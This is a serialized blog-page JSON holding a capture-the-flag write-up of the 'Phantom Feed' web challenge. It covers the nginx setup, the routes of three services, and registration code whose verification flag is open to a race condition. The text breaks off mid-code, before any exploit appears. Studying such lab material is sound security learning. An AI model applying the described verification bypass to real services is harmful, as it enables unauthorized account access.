[{"data":1,"prerenderedAt":5946},["ShallowReactive",2],{"content-query-UC05JR53Hy":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5941,"_id":5942,"_source":5825,"_file":5943,"_stem":5944,"_extension":5945},"/writeups/phantom-feed","writeups",false,"","Phantom Feed",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"Writeup of Phantom Feed a hard web challenge from htb-uni ctf 2023. Is about race condition and XSS.","web,race-condition,xss,oauth2,CVE-2023-33733","phantom-feed","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-08",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/phantom-feed",{"description":10},{"title":25},"Phantom Feed writeup",{"keywords":27},"web,race-condition,xss,oauth2,CVE-2023-33733,htb,ctf,writeup",{"type":29,"children":30,"toc":5934},"root",[31,38,45,51,57,62,257,264,269,275,280,289,324,332,337,343,348,355,368,375,380,386,393,398,417,423,428,432,437,441,454,922,1184,1189,1460,1465,1477,1515,1520,1912,1917,1922,2294,2299,2304,2309,2314,2318,2323,2327,2333,2338,2358,3030,3035,3041,3054,3059,3104,3107,3145,3149,3204,3224,3229,3233,3238,3242,3263,3267,3272,3277,3372,3377,4381,4386,4391,4404,4409,4413,4418,4455,4480,4492,4496,4502,4515,4534,4546,4550,4555,4559,4564,4568,4573,4579,4584,5198,5218,5230,5344,5349,5354,5851,5864,5878,5886,5891,5910,5915,5919,5924,5928],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":50},"Phantom Feed is a hard web challenge from htb-uni ctf 2023. There are a lot of files in this chal, in total there are 3 web services running.",{"type":32,"tag":52,"props":53,"children":56},"custom-image",{"imgSrc":54,":width":55},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704223463/writeups/phantom-feed/folder-expanded.webp","300",[],{"type":32,"tag":46,"props":58,"children":59},{},[60],{"type":37,"value":61},"Below you will find the nginx configuration for the challenges:",{"type":32,"tag":63,"props":64,"children":66},"code-card",{"lang":65},"conf",[67],{"type":32,"tag":68,"props":69,"children":72},"pre",{"className":70,"code":71,"language":65,"meta":7,"style":7},"language-conf shiki shiki-themes vitesse-dark","http {\n    server {\n        listen 1337;\n        server_name pantomfeed;\n        \n        location / {\n            proxy_pass http://127.0.0.1:5000;\n        }\n\n        location /phantomfeed {\n            proxy_pass http://127.0.0.1:3000;\n            proxy_set_header Host $host;\n            proxy_set_header X-Real-IP $remote_addr;\n        }\n\n        location /backend {\n            proxy_pass http://127.0.0.1:4000;\n        }\n    }\n}\n",[73],{"type":32,"tag":74,"props":75,"children":76},"code",{"__ignoreMap":7},[77,88,97,106,115,124,133,142,151,161,170,179,188,197,205,213,222,231,239,248],{"type":32,"tag":78,"props":79,"children":82},"span",{"class":80,"line":81},"line",1,[83],{"type":32,"tag":78,"props":84,"children":85},{},[86],{"type":37,"value":87},"http {\n",{"type":32,"tag":78,"props":89,"children":91},{"class":80,"line":90},2,[92],{"type":32,"tag":78,"props":93,"children":94},{},[95],{"type":37,"value":96},"    server {\n",{"type":32,"tag":78,"props":98,"children":100},{"class":80,"line":99},3,[101],{"type":32,"tag":78,"props":102,"children":103},{},[104],{"type":37,"value":105},"        listen 1337;\n",{"type":32,"tag":78,"props":107,"children":109},{"class":80,"line":108},4,[110],{"type":32,"tag":78,"props":111,"children":112},{},[113],{"type":37,"value":114},"        server_name pantomfeed;\n",{"type":32,"tag":78,"props":116,"children":118},{"class":80,"line":117},5,[119],{"type":32,"tag":78,"props":120,"children":121},{},[122],{"type":37,"value":123},"        \n",{"type":32,"tag":78,"props":125,"children":127},{"class":80,"line":126},6,[128],{"type":32,"tag":78,"props":129,"children":130},{},[131],{"type":37,"value":132},"        location / {\n",{"type":32,"tag":78,"props":134,"children":136},{"class":80,"line":135},7,[137],{"type":32,"tag":78,"props":138,"children":139},{},[140],{"type":37,"value":141},"            proxy_pass http://127.0.0.1:5000;\n",{"type":32,"tag":78,"props":143,"children":145},{"class":80,"line":144},8,[146],{"type":32,"tag":78,"props":147,"children":148},{},[149],{"type":37,"value":150},"        }\n",{"type":32,"tag":78,"props":152,"children":154},{"class":80,"line":153},9,[155],{"type":32,"tag":78,"props":156,"children":158},{"emptyLinePlaceholder":157},true,[159],{"type":37,"value":160},"\n",{"type":32,"tag":78,"props":162,"children":164},{"class":80,"line":163},10,[165],{"type":32,"tag":78,"props":166,"children":167},{},[168],{"type":37,"value":169},"        location /phantomfeed {\n",{"type":32,"tag":78,"props":171,"children":173},{"class":80,"line":172},11,[174],{"type":32,"tag":78,"props":175,"children":176},{},[177],{"type":37,"value":178},"            proxy_pass http://127.0.0.1:3000;\n",{"type":32,"tag":78,"props":180,"children":182},{"class":80,"line":181},12,[183],{"type":32,"tag":78,"props":184,"children":185},{},[186],{"type":37,"value":187},"            proxy_set_header Host $host;\n",{"type":32,"tag":78,"props":189,"children":191},{"class":80,"line":190},13,[192],{"type":32,"tag":78,"props":193,"children":194},{},[195],{"type":37,"value":196},"            proxy_set_header X-Real-IP $remote_addr;\n",{"type":32,"tag":78,"props":198,"children":200},{"class":80,"line":199},14,[201],{"type":32,"tag":78,"props":202,"children":203},{},[204],{"type":37,"value":150},{"type":32,"tag":78,"props":206,"children":208},{"class":80,"line":207},15,[209],{"type":32,"tag":78,"props":210,"children":211},{"emptyLinePlaceholder":157},[212],{"type":37,"value":160},{"type":32,"tag":78,"props":214,"children":216},{"class":80,"line":215},16,[217],{"type":32,"tag":78,"props":218,"children":219},{},[220],{"type":37,"value":221},"        location /backend {\n",{"type":32,"tag":78,"props":223,"children":225},{"class":80,"line":224},17,[226],{"type":32,"tag":78,"props":227,"children":228},{},[229],{"type":37,"value":230},"            proxy_pass http://127.0.0.1:4000;\n",{"type":32,"tag":78,"props":232,"children":234},{"class":80,"line":233},18,[235],{"type":32,"tag":78,"props":236,"children":237},{},[238],{"type":37,"value":150},{"type":32,"tag":78,"props":240,"children":242},{"class":80,"line":241},19,[243],{"type":32,"tag":78,"props":244,"children":245},{},[246],{"type":37,"value":247},"    }\n",{"type":32,"tag":78,"props":249,"children":251},{"class":80,"line":250},20,[252],{"type":32,"tag":78,"props":253,"children":254},{},[255],{"type":37,"value":256},"}\n",{"type":32,"tag":258,"props":259,"children":261},"h3",{"id":260},"port-5000",[262],{"type":37,"value":263},"Port 5000:",{"type":32,"tag":46,"props":265,"children":266},{},[267],{"type":37,"value":268},"This service is a Vue.js application, this frontend application interacts with the backend service (4000).",{"type":32,"tag":258,"props":270,"children":272},{"id":271},"port-3000",[273],{"type":37,"value":274},"Port 3000:",{"type":32,"tag":46,"props":276,"children":277},{},[278],{"type":37,"value":279},"This service is Flask application it allows a user to log in and generate a token via oauth2 to use in the Vue.js application.",{"type":32,"tag":46,"props":281,"children":282},{},[283],{"type":32,"tag":284,"props":285,"children":286},"strong",{},[287],{"type":37,"value":288},"Interesting routes:",{"type":32,"tag":290,"props":291,"children":292},"ul",{},[293,299,304,309,314,319],{"type":32,"tag":294,"props":295,"children":296},"li",{},[297],{"type":37,"value":298},"GET/POST /login - No middleware - Renders a login form (GET) and handles user authentication (POST).",{"type":32,"tag":294,"props":300,"children":301},{},[302],{"type":37,"value":303},"GET/POST /register - No middleware - Renders a registration form (GET) and handles user registration (POST).",{"type":32,"tag":294,"props":305,"children":306},{},[307],{"type":37,"value":308},"GET/POST /feed - auth_middleware - Displays posts (GET) and creates new posts (POST) after parameter validation, it also handles the bot (POST).",{"type":32,"tag":294,"props":310,"children":311},{},[312],{"type":37,"value":313},"GET /oauth2/auth - auth_middleware - Manages OAuth2 authorization by rendering an authorization page.",{"type":32,"tag":294,"props":315,"children":316},{},[317],{"type":37,"value":318},"GET /oauth2/code - auth_middleware - Generates an authorization code and redirects to the specified redirect_url.",{"type":32,"tag":294,"props":320,"children":321},{},[322],{"type":37,"value":323},"GET /oauth2/token - auth_middleware - Validates an authorization code and generates an access token in JSON format.",{"type":32,"tag":46,"props":325,"children":326},{},[327],{"type":32,"tag":284,"props":328,"children":329},{},[330],{"type":37,"value":331},"Middleware:",{"type":32,"tag":46,"props":333,"children":334},{},[335],{"type":37,"value":336},"The middleware ensures that certain routes are accessible only to authenticated users by redirecting to the login page if authentication fails or if the token is missing or invalid.",{"type":32,"tag":258,"props":338,"children":340},{"id":339},"port-4000",[341],{"type":37,"value":342},"Port 4000:",{"type":32,"tag":46,"props":344,"children":345},{},[346],{"type":37,"value":347},"This service is Flask application it allows to get some products and orders.",{"type":32,"tag":46,"props":349,"children":350},{},[351],{"type":32,"tag":284,"props":352,"children":353},{},[354],{"type":37,"value":288},{"type":32,"tag":290,"props":356,"children":357},{},[358,363],{"type":32,"tag":294,"props":359,"children":360},{},[361],{"type":37,"value":362},"GET / - No middleware - Returns an \"OK\" response.",{"type":32,"tag":294,"props":364,"children":365},{},[366],{"type":37,"value":367},"POST /orders/html - admin_middleware - Generates a PDF file containing orders in HTML format (Restricted to administrators).",{"type":32,"tag":46,"props":369,"children":370},{},[371],{"type":32,"tag":284,"props":372,"children":373},{},[374],{"type":37,"value":331},{"type":32,"tag":46,"props":376,"children":377},{},[378],{"type":37,"value":379},"The middleware admin_middleware is utilized to limit access to certain routes, only to users classified as administrators.",{"type":32,"tag":39,"props":381,"children":383},{"id":382},"race-condition",[384],{"type":37,"value":385},"Race Condition",{"type":32,"tag":387,"props":388,"children":390},"h4",{"id":389},"what-is-race-condition",[391],{"type":37,"value":392},"What is race condition?",{"type":32,"tag":46,"props":394,"children":395},{},[396],{"type":37,"value":397},"Before starting, it is important to recall what a race condition is:",{"type":32,"tag":399,"props":400,"children":401},"blockquote",{},[402],{"type":32,"tag":46,"props":403,"children":404},{},[405,407],{"type":37,"value":406},"Race conditions are a common type of vulnerability closely related to business logic flaws. They occur when websites process requests concurrently without adequate safeguards. This can lead to multiple distinct threads interacting with the same data at the same time, resulting in a \"collision\" that causes unintended behavior in the application. ",{"type":32,"tag":408,"props":409,"children":414},"a",{":target":410,"href":411,"rel":412},"_blank","https://portswigger.net/web-security/race-conditions",[413],"nofollow",[415],{"type":37,"value":416},"Portswigger",{"type":32,"tag":387,"props":418,"children":420},{"id":419},"initial-entry",[421],{"type":37,"value":422},"Initial entry",{"type":32,"tag":46,"props":424,"children":425},{},[426],{"type":37,"value":427},"Based on the numerous services, the initial entry point would be the token generation service (port 3000). The API that generates tokens has a route for registering a user. The first blocking point is that a message indicates that an email has been sent to us. However, no mail service is launched in the challenge.",{"type":32,"tag":52,"props":429,"children":431},{"imgSrc":430},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230708/writeups/phantom-feed/email_code_sent.webp",[],{"type":32,"tag":46,"props":433,"children":434},{},[435],{"type":37,"value":436},"And when we try to log in, we can see that the account is not verified.",{"type":32,"tag":52,"props":438,"children":440},{"imgSrc":439},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230615/writeups/phantom-feed/not_verified.webp",[],{"type":32,"tag":46,"props":442,"children":443},{},[444,446,452],{"type":37,"value":445},"We can see in the code that a boolean attribute ",{"type":32,"tag":74,"props":447,"children":449},{"className":448},[],[450],{"type":37,"value":451},"verified",{"type":37,"value":453}," is set to False during registration. Therefore, we need to find a way to bypass it in order to have a valid account.",{"type":32,"tag":63,"props":455,"children":457},{"lang":456},"python",[458],{"type":32,"tag":68,"props":459,"children":462},{"className":460,"code":461,"language":456,"meta":7,"style":7},"language-python shiki shiki-themes vitesse-dark","@web.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n  [...]\n  user_valid, user_id = db_session.create_user(username, password, email) # \u003C--- Here the account is created\n  [...]\n  email_client = EmailClient(email)\n  verification_code = db_session.add_verification(user_id) # \u003C--- Here is the boolean set to False\n  email_client.send_email(f\"http://phantomfeed.htb/phantomfeed/confirm?verification_code={verification_code}\")\n  \n  return render_template(\"error.html\", title=\"error\", error=\"verification code sent\"), 200\n",[463],{"type":32,"tag":74,"props":464,"children":465},{"__ignoreMap":7},[466,564,583,602,677,692,723,766,820,828],{"type":32,"tag":78,"props":467,"children":468},{"class":80,"line":81},[469,475,481,486,491,496,502,508,512,517,523,528,532,537,541,545,550,555,559],{"type":32,"tag":78,"props":470,"children":472},{"style":471},"--shiki-default:#666666",[473],{"type":37,"value":474},"@",{"type":32,"tag":78,"props":476,"children":478},{"style":477},"--shiki-default:#80A665",[479],{"type":37,"value":480},"web",{"type":32,"tag":78,"props":482,"children":483},{"style":471},[484],{"type":37,"value":485},".",{"type":32,"tag":78,"props":487,"children":488},{"style":477},[489],{"type":37,"value":490},"route",{"type":32,"tag":78,"props":492,"children":493},{"style":471},[494],{"type":37,"value":495},"(",{"type":32,"tag":78,"props":497,"children":499},{"style":498},"--shiki-default:#C98A7D77",[500],{"type":37,"value":501},"\"",{"type":32,"tag":78,"props":503,"children":505},{"style":504},"--shiki-default:#C98A7D",[506],{"type":37,"value":507},"/register",{"type":32,"tag":78,"props":509,"children":510},{"style":498},[511],{"type":37,"value":501},{"type":32,"tag":78,"props":513,"children":514},{"style":471},[515],{"type":37,"value":516},",",{"type":32,"tag":78,"props":518,"children":520},{"style":519},"--shiki-default:#BD976A",[521],{"type":37,"value":522}," methods",{"type":32,"tag":78,"props":524,"children":525},{"style":471},[526],{"type":37,"value":527},"=[",{"type":32,"tag":78,"props":529,"children":530},{"style":498},[531],{"type":37,"value":501},{"type":32,"tag":78,"props":533,"children":534},{"style":504},[535],{"type":37,"value":536},"GET",{"type":32,"tag":78,"props":538,"children":539},{"style":498},[540],{"type":37,"value":501},{"type":32,"tag":78,"props":542,"children":543},{"style":471},[544],{"type":37,"value":516},{"type":32,"tag":78,"props":546,"children":547},{"style":498},[548],{"type":37,"value":549}," \"",{"type":32,"tag":78,"props":551,"children":552},{"style":504},[553],{"type":37,"value":554},"POST",{"type":32,"tag":78,"props":556,"children":557},{"style":498},[558],{"type":37,"value":501},{"type":32,"tag":78,"props":560,"children":561},{"style":471},[562],{"type":37,"value":563},"])\n",{"type":32,"tag":78,"props":565,"children":566},{"class":80,"line":90},[567,573,578],{"type":32,"tag":78,"props":568,"children":570},{"style":569},"--shiki-default:#CB7676",[571],{"type":37,"value":572},"def",{"type":32,"tag":78,"props":574,"children":575},{"style":477},[576],{"type":37,"value":577}," register",{"type":32,"tag":78,"props":579,"children":580},{"style":471},[581],{"type":37,"value":582},"():\n",{"type":32,"tag":78,"props":584,"children":585},{"class":80,"line":99},[586,591,597],{"type":32,"tag":78,"props":587,"children":588},{"style":471},[589],{"type":37,"value":590},"  [",{"type":32,"tag":78,"props":592,"children":594},{"style":593},"--shiki-default:#C99076",[595],{"type":37,"value":596},"...",{"type":32,"tag":78,"props":598,"children":599},{"style":471},[600],{"type":37,"value":601},"]\n",{"type":32,"tag":78,"props":603,"children":604},{"class":80,"line":108},[605,611,615,620,625,630,634,639,643,648,652,657,661,666,671],{"type":32,"tag":78,"props":606,"children":608},{"style":607},"--shiki-default:#DBD7CAEE",[609],{"type":37,"value":610},"  user_valid",{"type":32,"tag":78,"props":612,"children":613},{"style":471},[614],{"type":37,"value":516},{"type":32,"tag":78,"props":616,"children":617},{"style":607},[618],{"type":37,"value":619}," user_id ",{"type":32,"tag":78,"props":621,"children":622},{"style":471},[623],{"type":37,"value":624},"=",{"type":32,"tag":78,"props":626,"children":627},{"style":607},[628],{"type":37,"value":629}," db_session",{"type":32,"tag":78,"props":631,"children":632},{"style":471},[633],{"type":37,"value":485},{"type":32,"tag":78,"props":635,"children":636},{"style":607},[637],{"type":37,"value":638},"create_user",{"type":32,"tag":78,"props":640,"children":641},{"style":471},[642],{"type":37,"value":495},{"type":32,"tag":78,"props":644,"children":645},{"style":607},[646],{"type":37,"value":647},"username",{"type":32,"tag":78,"props":649,"children":650},{"style":471},[651],{"type":37,"value":516},{"type":32,"tag":78,"props":653,"children":654},{"style":607},[655],{"type":37,"value":656}," password",{"type":32,"tag":78,"props":658,"children":659},{"style":471},[660],{"type":37,"value":516},{"type":32,"tag":78,"props":662,"children":663},{"style":607},[664],{"type":37,"value":665}," email",{"type":32,"tag":78,"props":667,"children":668},{"style":471},[669],{"type":37,"value":670},")",{"type":32,"tag":78,"props":672,"children":674},{"style":673},"--shiki-default:#758575DD",[675],{"type":37,"value":676}," # \u003C--- Here the account is created\n",{"type":32,"tag":78,"props":678,"children":679},{"class":80,"line":117},[680,684,688],{"type":32,"tag":78,"props":681,"children":682},{"style":471},[683],{"type":37,"value":590},{"type":32,"tag":78,"props":685,"children":686},{"style":593},[687],{"type":37,"value":596},{"type":32,"tag":78,"props":689,"children":690},{"style":471},[691],{"type":37,"value":601},{"type":32,"tag":78,"props":693,"children":694},{"class":80,"line":126},[695,700,704,709,713,718],{"type":32,"tag":78,"props":696,"children":697},{"style":607},[698],{"type":37,"value":699},"  email_client ",{"type":32,"tag":78,"props":701,"children":702},{"style":471},[703],{"type":37,"value":624},{"type":32,"tag":78,"props":705,"children":706},{"style":607},[707],{"type":37,"value":708}," EmailClient",{"type":32,"tag":78,"props":710,"children":711},{"style":471},[712],{"type":37,"value":495},{"type":32,"tag":78,"props":714,"children":715},{"style":607},[716],{"type":37,"value":717},"email",{"type":32,"tag":78,"props":719,"children":720},{"style":471},[721],{"type":37,"value":722},")\n",{"type":32,"tag":78,"props":724,"children":725},{"class":80,"line":135},[726,731,735,739,743,748,752,757,761],{"type":32,"tag":78,"props":727,"children":728},{"style":607},[729],{"type":37,"value":730},"  verification_code ",{"type":32,"tag":78,"props":732,"children":733},{"style":471},[734],{"type":37,"value":624},{"type":32,"tag":78,"props":736,"children":737},{"style":607},[738],{"type":37,"value":629},{"type":32,"tag":78,"props":740,"children":741},{"style":471},[742],{"type":37,"value":485},{"type":32,"tag":78,"props":744,"children":745},{"style":607},[746],{"type":37,"value":747},"add_verification",{"type":32,"tag":78,"props":749,"children":750},{"style":471},[751],{"type":37,"value":495},{"type":32,"tag":78,"props":753,"children":754},{"style":607},[755],{"type":37,"value":756},"user_id",{"type":32,"tag":78,"props":758,"children":759},{"style":471},[760],{"type":37,"value":670},{"type":32,"tag":78,"props":762,"children":763},{"style":673},[764],{"type":37,"value":765}," # \u003C--- Here is the boolean set to False\n",{"type":32,"tag":78,"props":767,"children":768},{"class":80,"line":144},[769,774,778,783,787,792,797,802,807,812,816],{"type":32,"tag":78,"props":770,"children":771},{"style":607},[772],{"type":37,"value":773},"  email_client",{"type":32,"tag":78,"props":775,"children":776},{"style":471},[777],{"type":37,"value":485},{"type":32,"tag":78,"props":779,"children":780},{"style":607},[781],{"type":37,"value":782},"send_email",{"type":32,"tag":78,"props":784,"children":785},{"style":471},[786],{"type":37,"value":495},{"type":32,"tag":78,"props":788,"children":789},{"style":569},[790],{"type":37,"value":791},"f",{"type":32,"tag":78,"props":793,"children":794},{"style":504},[795],{"type":37,"value":796},"\"http://phantomfeed.htb/phantomfeed/confirm?verification_code=",{"type":32,"tag":78,"props":798,"children":799},{"style":593},[800],{"type":37,"value":801},"{",{"type":32,"tag":78,"props":803,"children":804},{"style":607},[805],{"type":37,"value":806},"verification_code",{"type":32,"tag":78,"props":808,"children":809},{"style":593},[810],{"type":37,"value":811},"}",{"type":32,"tag":78,"props":813,"children":814},{"style":504},[815],{"type":37,"value":501},{"type":32,"tag":78,"props":817,"children":818},{"style":471},[819],{"type":37,"value":722},{"type":32,"tag":78,"props":821,"children":822},{"class":80,"line":153},[823],{"type":32,"tag":78,"props":824,"children":825},{"style":607},[826],{"type":37,"value":827},"  \n",{"type":32,"tag":78,"props":829,"children":830},{"class":80,"line":163},[831,837,842,846,850,855,859,863,868,872,876,881,885,889,894,898,902,907,911,916],{"type":32,"tag":78,"props":832,"children":834},{"style":833},"--shiki-default:#4D9375",[835],{"type":37,"value":836},"  return",{"type":32,"tag":78,"props":838,"children":839},{"style":607},[840],{"type":37,"value":841}," render_template",{"type":32,"tag":78,"props":843,"children":844},{"style":471},[845],{"type":37,"value":495},{"type":32,"tag":78,"props":847,"children":848},{"style":498},[849],{"type":37,"value":501},{"type":32,"tag":78,"props":851,"children":852},{"style":504},[853],{"type":37,"value":854},"error.html",{"type":32,"tag":78,"props":856,"children":857},{"style":498},[858],{"type":37,"value":501},{"type":32,"tag":78,"props":860,"children":861},{"style":471},[862],{"type":37,"value":516},{"type":32,"tag":78,"props":864,"children":865},{"style":519},[866],{"type":37,"value":867}," title",{"type":32,"tag":78,"props":869,"children":870},{"style":471},[871],{"type":37,"value":624},{"type":32,"tag":78,"props":873,"children":874},{"style":498},[875],{"type":37,"value":501},{"type":32,"tag":78,"props":877,"children":878},{"style":504},[879],{"type":37,"value":880},"error",{"type":32,"tag":78,"props":882,"children":883},{"style":498},[884],{"type":37,"value":501},{"type":32,"tag":78,"props":886,"children":887},{"style":471},[888],{"type":37,"value":516},{"type":32,"tag":78,"props":890,"children":891},{"style":519},[892],{"type":37,"value":893}," error",{"type":32,"tag":78,"props":895,"children":896},{"style":471},[897],{"type":37,"value":624},{"type":32,"tag":78,"props":899,"children":900},{"style":498},[901],{"type":37,"value":501},{"type":32,"tag":78,"props":903,"children":904},{"style":504},[905],{"type":37,"value":906},"verification code sent",{"type":32,"tag":78,"props":908,"children":909},{"style":498},[910],{"type":37,"value":501},{"type":32,"tag":78,"props":912,"children":913},{"style":471},[914],{"type":37,"value":915},"),",{"type":32,"tag":78,"props":917,"children":919},{"style":918},"--shiki-default:#4C9A91",[920],{"type":37,"value":921}," 200\n",{"type":32,"tag":63,"props":923,"children":924},{"lang":456},[925],{"type":32,"tag":68,"props":926,"children":928},{"className":460,"code":927,"language":456,"meta":7,"style":7},"def add_verification(self, user_id):\n    verification_code = generate(12)\n    self.session.query(Users).filter(Users.id == user_id)\n      .update({\"verification_code\": verification_code, \"verified\": False})\n    self.session.commit()\n    return verification_code\n",[929],{"type":32,"tag":74,"props":930,"children":931},{"__ignoreMap":7},[932,967,997,1072,1142,1171],{"type":32,"tag":78,"props":933,"children":934},{"class":80,"line":81},[935,939,944,948,953,957,962],{"type":32,"tag":78,"props":936,"children":937},{"style":569},[938],{"type":37,"value":572},{"type":32,"tag":78,"props":940,"children":941},{"style":477},[942],{"type":37,"value":943}," add_verification",{"type":32,"tag":78,"props":945,"children":946},{"style":471},[947],{"type":37,"value":495},{"type":32,"tag":78,"props":949,"children":950},{"style":607},[951],{"type":37,"value":952},"self",{"type":32,"tag":78,"props":954,"children":955},{"style":471},[956],{"type":37,"value":516},{"type":32,"tag":78,"props":958,"children":959},{"style":607},[960],{"type":37,"value":961}," user_id",{"type":32,"tag":78,"props":963,"children":964},{"style":471},[965],{"type":37,"value":966},"):\n",{"type":32,"tag":78,"props":968,"children":969},{"class":80,"line":90},[970,975,979,984,988,993],{"type":32,"tag":78,"props":971,"children":972},{"style":607},[973],{"type":37,"value":974},"    verification_code ",{"type":32,"tag":78,"props":976,"children":977},{"style":471},[978],{"type":37,"value":624},{"type":32,"tag":78,"props":980,"children":981},{"style":607},[982],{"type":37,"value":983}," generate",{"type":32,"tag":78,"props":985,"children":986},{"style":471},[987],{"type":37,"value":495},{"type":32,"tag":78,"props":989,"children":990},{"style":918},[991],{"type":37,"value":992},"12",{"type":32,"tag":78,"props":994,"children":995},{"style":471},[996],{"type":37,"value":722},{"type":32,"tag":78,"props":998,"children":999},{"class":80,"line":99},[1000,1005,1009,1014,1018,1023,1027,1032,1037,1042,1046,1050,1054,1059,1064,1068],{"type":32,"tag":78,"props":1001,"children":1002},{"style":593},[1003],{"type":37,"value":1004},"    self",{"type":32,"tag":78,"props":1006,"children":1007},{"style":471},[1008],{"type":37,"value":485},{"type":32,"tag":78,"props":1010,"children":1011},{"style":607},[1012],{"type":37,"value":1013},"session",{"type":32,"tag":78,"props":1015,"children":1016},{"style":471},[1017],{"type":37,"value":485},{"type":32,"tag":78,"props":1019,"children":1020},{"style":607},[1021],{"type":37,"value":1022},"query",{"type":32,"tag":78,"props":1024,"children":1025},{"style":471},[1026],{"type":37,"value":495},{"type":32,"tag":78,"props":1028,"children":1029},{"style":607},[1030],{"type":37,"value":1031},"Users",{"type":32,"tag":78,"props":1033,"children":1034},{"style":471},[1035],{"type":37,"value":1036},").",{"type":32,"tag":78,"props":1038,"children":1039},{"style":607},[1040],{"type":37,"value":1041},"filter",{"type":32,"tag":78,"props":1043,"children":1044},{"style":471},[1045],{"type":37,"value":495},{"type":32,"tag":78,"props":1047,"children":1048},{"style":607},[1049],{"type":37,"value":1031},{"type":32,"tag":78,"props":1051,"children":1052},{"style":471},[1053],{"type":37,"value":485},{"type":32,"tag":78,"props":1055,"children":1056},{"style":607},[1057],{"type":37,"value":1058},"id ",{"type":32,"tag":78,"props":1060,"children":1061},{"style":569},[1062],{"type":37,"value":1063},"==",{"type":32,"tag":78,"props":1065,"children":1066},{"style":607},[1067],{"type":37,"value":961},{"type":32,"tag":78,"props":1069,"children":1070},{"style":471},[1071],{"type":37,"value":722},{"type":32,"tag":78,"props":1073,"children":1074},{"class":80,"line":108},[1075,1080,1085,1090,1094,1098,1102,1107,1112,1116,1120,1124,1128,1132,1137],{"type":32,"tag":78,"props":1076,"children":1077},{"style":471},[1078],{"type":37,"value":1079},"      .",{"type":32,"tag":78,"props":1081,"children":1082},{"style":607},[1083],{"type":37,"value":1084},"update",{"type":32,"tag":78,"props":1086,"children":1087},{"style":471},[1088],{"type":37,"value":1089},"({",{"type":32,"tag":78,"props":1091,"children":1092},{"style":498},[1093],{"type":37,"value":501},{"type":32,"tag":78,"props":1095,"children":1096},{"style":504},[1097],{"type":37,"value":806},{"type":32,"tag":78,"props":1099,"children":1100},{"style":498},[1101],{"type":37,"value":501},{"type":32,"tag":78,"props":1103,"children":1104},{"style":471},[1105],{"type":37,"value":1106},":",{"type":32,"tag":78,"props":1108,"children":1109},{"style":607},[1110],{"type":37,"value":1111}," verification_code",{"type":32,"tag":78,"props":1113,"children":1114},{"style":471},[1115],{"type":37,"value":516},{"type":32,"tag":78,"props":1117,"children":1118},{"style":498},[1119],{"type":37,"value":549},{"type":32,"tag":78,"props":1121,"children":1122},{"style":504},[1123],{"type":37,"value":451},{"type":32,"tag":78,"props":1125,"children":1126},{"style":498},[1127],{"type":37,"value":501},{"type":32,"tag":78,"props":1129,"children":1130},{"style":471},[1131],{"type":37,"value":1106},{"type":32,"tag":78,"props":1133,"children":1134},{"style":833},[1135],{"type":37,"value":1136}," False",{"type":32,"tag":78,"props":1138,"children":1139},{"style":471},[1140],{"type":37,"value":1141},"})\n",{"type":32,"tag":78,"props":1143,"children":1144},{"class":80,"line":117},[1145,1149,1153,1157,1161,1166],{"type":32,"tag":78,"props":1146,"children":1147},{"style":593},[1148],{"type":37,"value":1004},{"type":32,"tag":78,"props":1150,"children":1151},{"style":471},[1152],{"type":37,"value":485},{"type":32,"tag":78,"props":1154,"children":1155},{"style":607},[1156],{"type":37,"value":1013},{"type":32,"tag":78,"props":1158,"children":1159},{"style":471},[1160],{"type":37,"value":485},{"type":32,"tag":78,"props":1162,"children":1163},{"style":607},[1164],{"type":37,"value":1165},"commit",{"type":32,"tag":78,"props":1167,"children":1168},{"style":471},[1169],{"type":37,"value":1170},"()\n",{"type":32,"tag":78,"props":1172,"children":1173},{"class":80,"line":126},[1174,1179],{"type":32,"tag":78,"props":1175,"children":1176},{"style":833},[1177],{"type":37,"value":1178},"    return",{"type":32,"tag":78,"props":1180,"children":1181},{"style":607},[1182],{"type":37,"value":1183}," verification_code\n",{"type":32,"tag":46,"props":1185,"children":1186},{},[1187],{"type":37,"value":1188},"We can see below that by default the attribute verified is set to True and is only changed to False at the time of sending the email.",{"type":32,"tag":63,"props":1190,"children":1191},{"lang":456},[1192],{"type":32,"tag":68,"props":1193,"children":1195},{"className":460,"code":1194,"language":456,"meta":7,"style":7},"class Users(Base):\n    __tablename__ = \"users\"\n    id = Column(Integer, primary_key=True)\n    verification_code = Column(String)\n    verified = Column(Boolean, default=True)\n    username = Column(String)\n    password = Column(String)\n    email = Column(String)\n",[1196],{"type":32,"tag":74,"props":1197,"children":1198},{"__ignoreMap":7},[1199,1226,1252,1302,1330,1376,1404,1432],{"type":32,"tag":78,"props":1200,"children":1201},{"class":80,"line":81},[1202,1207,1213,1217,1222],{"type":32,"tag":78,"props":1203,"children":1204},{"style":569},[1205],{"type":37,"value":1206},"class",{"type":32,"tag":78,"props":1208,"children":1210},{"style":1209},"--shiki-default:#5DA994",[1211],{"type":37,"value":1212}," Users",{"type":32,"tag":78,"props":1214,"children":1215},{"style":471},[1216],{"type":37,"value":495},{"type":32,"tag":78,"props":1218,"children":1219},{"style":477},[1220],{"type":37,"value":1221},"Base",{"type":32,"tag":78,"props":1223,"children":1224},{"style":471},[1225],{"type":37,"value":966},{"type":32,"tag":78,"props":1227,"children":1228},{"class":80,"line":90},[1229,1234,1238,1242,1247],{"type":32,"tag":78,"props":1230,"children":1231},{"style":607},[1232],{"type":37,"value":1233},"    __tablename__ 